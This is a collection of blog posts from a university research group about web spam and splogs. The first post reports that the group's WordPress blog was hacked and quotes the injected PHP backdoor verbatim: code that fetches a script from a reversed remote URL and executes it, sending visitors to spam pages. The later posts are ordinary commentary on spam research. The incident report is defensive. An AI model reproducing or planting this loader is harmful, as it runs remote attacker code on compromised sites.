Ebiquity Google alert tripwires triggered

May 21st, 2009

Yesterday we discovered that our ebiquity blog had been hacked. It looks like a vulnerability in our old WordPress installation was exploited to add the following code to the top of our blog’s main page.

< ?php $site = create_function('','$cachedir="/tmp/"; $param="qq"; $key=$_GET[$param]; $rand="1239aef"; $said=23; $type=1; $stprot="http://blogwp.info"; '.file_get_contents(strrev("txt.mrahp/elpmaxe/deliated/ofni.pwgolb//:ptth"))); $site(); ?>

This code caused URLs like https://ebiquity.umbc.edu/?qq=1671 to redirect to a spam page. We’ve upgraded the blog to the latest WordPress release, which hopefully will prevent this exploit from being used again. (Notice the reversed URL — LOL!)

We discovered the problem though a clever trick I read about last year on a site I’ve forgotten (maybe here). We created several Google alerts triggered by the appearance of spam-related words on pages apparently hosted by ebiquity.umbc.edu. For example:

  • adult OR girls OR sex OR sexx OR XXX OR porn OR pornography site:ebiquity.umbc.edu
  • viagra OR cialis OR levitra OR Phentermine OR Xanax site:ebiquity.umbc.edu

I would get several false positives a month from these alerts triggered by non-spam entries on our site. In fact, *this* post will generate a false positive. But yesterday I got a true positive. Looking at the log files, I think I got the alert within a few hours of when our blog was hacked. So I am happy to say that this worked and worked well. Without this alert, it might have taken weeks to notice the problem.

Google alert for a hacked website

The results of this Google search reveal many compromised blogs from the .edu domain.

Storms on Planet Social Media Research

May 7th, 2009

We maintain Planet Social Media Research (SMR) as a feed aggregator for a set of blogs relevant to research in social media systems. A few days ago I noticed that it wasn’t including new posts from some of the blogs. After updating the Planet Venus software we use and poking around I discovered that our server is unable to access any feeds that resolve to Feedburner.

Apparently Feedburner has a blacklist of IP addresses that it blocks and our server must now be on it. We have a request in to straighten this out and hope that everything will be back to normal very soon. ( I was to get our own blog back onto Planet SMR because I reconfigured the system to revert to the old, non-Feedburner feed.)

We’ve not yet heard from Feedburner/Google and don’t know why we are on their blacklist. It’s unlikely to be a result of our accessing feeds too frequently: we rebuild the site and aggregated feed once an hour and only about ten of our feeds resolve to feedburner.

My speculation is that this is collateral damage in the global war on spam. The easiest way for splogs (spam blogs) to get content is to hijack feeds from other blogs. Web spammers can do even better at disguising their splogs as legitimate sites if they aggregate several feeds that are topically related.

One way to fight such splogs is to deny them access to the feeds. So Google could be trying to protect Feedburner users and also be a good steward of the the Web environment by blocking suspected web spammers from the feeds hosted by Feedburner.

So, my guess is that the Google thinks that the Planet SMR site is a splog. We are not, of course. We only include the feeds of blogs that want to be on SMR. We also do not host any ads, which is a motivation for most splogs.

If our speculation is right, and Google is blocking our access because it thinks we are a splog site, then there will be many other legitimate feed aggregator sites that have or soon will have this problem.

By the way — we are always interested in suggestions for new blogs to add to Planet SMR. If you have or know of one, contact us as planet-smr at cs.umbc.edu.

update 5/8: We’ve identified and solved the problem, thanks to Google Freebase ‘community expert’ Franklin Tse. The problem was due to our having an old entry for the freebase IP address in the server’s /etc/hosts table. I think we added when we were having some technical difficulties some years ago and wanted to keep our key services running smoothly. I guess the trouble with quick temporary hacks is that they’re easy to forget and come back to bite you.

Spammers are using Amazon EC2

July 1st, 2008

The Washington Posts Security Fix blog has a post, Amazon: Hey Spammers, Get Off My Cloud!, reporting on allegations that spammers are starting to use Amazon’s Elastic Compute Cloud (EC2) servers. It only makes sense — you can sign up easily without committing to a contract of any length, the price is low, and the IP addresses are drawn from a wide range, making it hard to block them all. Besides, if Amazon’s EC2 IP addresses all get put in a spam blacklist, it will be bad for their many legitimate users. It may be tricky for Amazon to police this.

Blog comment spam magnet

July 1st, 2008

A good fraction of the comment spam that makes it through our Akismet filter is from people who are trying to add a comment to one of our posts about spam blogs or comments. Here’s an example from today’s batch, a comment on a two-year old post Blog comment spam with plagiarized text: hard to spot from cameroun trying to promote the site africapresse.com.

“spam is a real problem in this day not just for .edu but for the entire internet world. Plagiarism is a problem too.”

It’s easy for me to classify this as spam since the comment was made on a very old post, is short, includes a reference to a site that looks commercial, makes a few general and superficial statements that are not really tied to any of the posts details.

I think it’s ironic that so many SEO wannabes try to spam posts about spam. I guess they just have spam on the brain. So, I offer up this post as food for the comment spammers and their search and comment tools.

akismet, anti-spam, antispam, automated, automated, automatic, backlink, backlinks, bad behavior, blacklist, block, blocking, blog, blogging, capcha, comment, comment spam, comments, human, keywords, links, links, nofollow, pagerank, people, plagiarize, plagiarism, rank, search engine optimization, seo, spam, spam blogs, spam comments, spam karma, spamming, splog, splog, splogs, steal, target, trackbacks, traffic, typepad, wordpress.

Splogs and politics

July 1st, 2008

Here’s something I never expected: splogs as a political issue. Actually, it’s allegations of political blogs being splogs, or rather allegations of accusing political blogs of being a splogs in order to get Google to block them. The NYT Bits blog has a post, Google and the Anti-Obama Bloggers, that describes the controversy.

“Did Google use its network of online services to silence critics of Barack Obama? That was the question buzzing on a corner of the blogosphere over the last few days, after several anti-Obama bloggers were unable to update their sites, which are hosted on Google’s Blogger service. … In an article that appeared on Bloggasm.com, the reporter Simon Owens spoke with some of the affected bloggers, who said they believed that Google had fallen prey to a campaign by activists supporting Senator Obama. According to the bloggers, the Obama supporters had clicked on a “flag” on the anti-Obama blogs alerting Google that they were spam.”

Maybe this is a good reason to rely on the judgment of machines, at least until they start running for office.

No spam on Twitter?!

February 25th, 2008

Can it be true? Russell Beattie posts that on Twitter there are nearly a million users, and no spam or trolls. Spam does exist on Twitter, of course, but it does seem to be less of a problem than on the Blogosphere, Web or email. Maybe it’s because that search engines don’t treat tweets like Web pages or blog posts.

Sifry’s state of the blogosphere

February 6th, 2006

Technorati’s David Sifry has posted another State of the Blogosphere report with lots of interesting statistics. Highlights include

  • Technorati tracks 50K posts and hour from 27M blogs.
  • The number of blogs doubles evey six months.
  • Splogs and spings are increasing.
  • Tagging is increasingly popular.

Half of Swoogle’s hits are from referer log spammers

February 4th, 2006

We are using bbclone to generate reports on Swoogle access. Look at today’s top 10 referers as of 3:00pm:

  www.legaladvocate.net  246     26.14%
  www.myjavaserver.com   152     16.15%
  www.google.com         125     13.28%
  dannyayers.com         44      4.68%
  lucky7.to              34      3.61%
  ebiquity.umbc.edu      25      2.66%
  www.google.de          18      1.91%
  planetrdf.com          18      1.91%
  mail.google.com        18      1.91%
  groups.google.com      14      1.49%

One and five are clearly spam sites and two is suspicious, too. The first, for example, appears to be about poker, though the site name is legaladvocat. The site’s text is obviously automatically generated nonsense. All of the links point to subpages in the same domain with a similar structure and content. I assume that once the site achineves a high pageRank, it will be repurposed or sold.

So, it seems like nearly 50% of our hits are due to referer log spamming. I’d guess Swoogle was picked by finding its URL on recent posts found on a blog search engine or a ping server.

Splogs, like spam, will be with us for a while

January 24th, 2006

Two years ago Bill Gates predicted that the spam problem would be solved by now, as this article in The Register reports.

Hey Bill, why am I still getting spam?
Junk mail outlives MS mortality prediction
By John Leyden, 24 January 2006

Two years ago today Bill Gates predicted that spam email would be eradicated as a problem within 24 months. The Microsoft chairman predicted the death of spam in a speech at the World Economic Forum on 24 February 2004.

Gates outlined a three-stage plan to eradicate spam within two years. Microsoft’s scheme calls for better filters to weed out spam messages and sender authentication via a form of challenge-response system. Secondly, Microsoft wants to see to a form of tar-pitting so that emails coming from unknown senders are slowed down to a point where bulk mail runs become impractical.

Lastly, and most promisingly as far as Gates is concerned, is a digital equivalent of stamps for email, to be paid out only if the recipient considers an email to be spam. Blocking spam email would appear to be a simple problem but in practice is far trickier than Gates, or indeed the industry, first thought.

It’s tempting to think that we are close to being able to solve the splog identification problem, which enable blog search engines to weed the slogs out of their indices. But, I’ll bet that splogs will be with us for a long time, as is the case with spam. Of course, we do have to work hard to keep them under control, just as we do with spam. If we don’t, the blogosphere will be quickly overrun and its promise squandered.

UMBC blog research on splogs in Baltimore Sun

January 17th, 2006

Baltimore Sun’s Troy McCullough talks about Pranam Kolari’s work on detecting splogs in his column on Sunday, 15 January 2006. The column also has an associated podcast.

Fighting spam sites – latest battle in the blog wars
On Blogs: Troy McCullough, Jan 15, 2006

It seems that everyone has a blog these days – a spot that others can visit to find out what they have to say about something or nothing in particular. Some blogs are widely valued fonts of specialized wisdom, but many are viewed as uninteresting expressions of personal ego. The difficulty of sorting the good blogs from the bad can be a frustrating challenge – one that is seen as a serious threat to what has been viewed as a vital feature of the Internet.

Now, three University of Maryland, Baltimore County researchers have made a far more disturbing conclusion about blogs. After analyzing millions of blog posts, they have determined that the blogosphere is drowning in spam, the pejorative nickname given to unsolicited Internet advertising. Using data collected by weblogs.com, a prominent blog tracking service, doctoral student Pranam Kolari and professors Tim Finin and Anupam Joshi analyzed 40 million blog updates submitted from 14 million blogs.

Welcome to the Splogosphere: 75% of new pings are spings (splogs)

December 15th, 2005

In the blogosphere, pings are notifications sent by updated blogs to PingServers. A major issue recently has been unjustified pings, also known as Spings, sent by Splogs. Splogs have been discussed a lot recently, including an interesting thread on post piracy that Steve Rubel initiated on Micropersuasion.

The problem of splogs prompted us to analyze pings from weblogs.com, which publishes hourly pings as changes.xml. We have been collecting these pings over the last 4 weeks for a total of 40 million pings from around 14 million (so claimed) blogs. To begin with, we applied a language identification technique implemented by James Mayfield to identify language by fetching these blogs. As expected most of the pings were from blogs authored in English. But we were able to identify blogs from many other languages as well. For instance, charts below show a distribution of pings from blogs authored in Italian — over a day and over a week. Each bar denotes the number of pings per hour.

Pings over a day
Pings over 8 days

All times are in GMT; clearly Italian authored blogs display a specific blogging pattern.

In the next step we used our work on splog detection to detect splogs (and hence spings) among the english blogs. Our detection mechanism is close to 90% accurate. As shown in the charts below pings from blogs average around 8K per hour and those from splogs average around 25K.

Blog Pings
Splog Pings

Clearly almost 3 out of 4 pings are spings! Going back further to the source of these spings, we observed that more than 50% of claimed blogs pinging weblogs.com are splogs.

Based on the interestingness of this preliminary statistics, scope for further analysis and interest in the resulting dataset we decided to continuosly monitor the pingosphere. So, we now do it “live” on updated blogs published by weblogs.com(delayed by an hour), and have made it publicly available at http://memeta.umbc.edu. The site lists blogging patterns for many other languages, and compares splogs with blogs. All of our work is part of a larger project memeta, towards analyzing the content and structure of the blogosphere.

We hope our effort is a good complement to existing services (e.g., FightSplog, SplogReporter and SplogSpot) towards combating splogs. We currently publish only simple ping statistics on this site, but do stay tuned for fresh splog and classified blog dumps and much more!

UPDATE: Matthew Hurst from BlogPulse points us to an interesting analysis he has done on a day of weblogs.com pings.